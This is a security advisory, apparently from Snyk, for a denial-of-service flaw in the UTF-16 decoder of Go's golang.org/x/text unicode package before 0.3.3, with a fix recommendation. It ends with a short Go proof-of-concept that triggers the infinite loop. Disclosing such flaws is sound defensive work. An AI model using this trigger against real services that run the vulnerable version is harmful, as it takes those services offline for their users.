Denial of Service (DoS) Affecting github.com/golang/text/encoding/unicode package, versions <0.3.3


0.0
high
  • Exploit Maturity

    Proof of concept

  • Attack Complexity

    Low

  • Availability

    High

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • snyk-id

    SNYK-GOLANG-GITHUBCOMGOLANGTEXTENCODINGUNICODE-609610

  • published

    3 Sep 2020

  • disclosed

    9 Jun 2020

  • credit

    Evgeny Kapun

How to fix?

Upgrade github.com/golang/text/encoding/unicode to version 0.3.3 or higher.

Overview

github.com/golang/text/encoding/unicode is a Package unicode provides Unicode encodings such as UTF-16.

Affected versions of this package are vulnerable to Denial of Service (DoS). It is possible to exploit the UTF-16 decoder into entering an infinite loop, causing the program to crash or run out of memory.

PoC

package main

import ( "fmt" "golang.org/x/text/encoding/unicode" ) func main() { res, err := unicode.UTF16(unicode.BigEndian, unicode.UseBOM).NewDecoder().String(" ") fmt.Println(res, err) }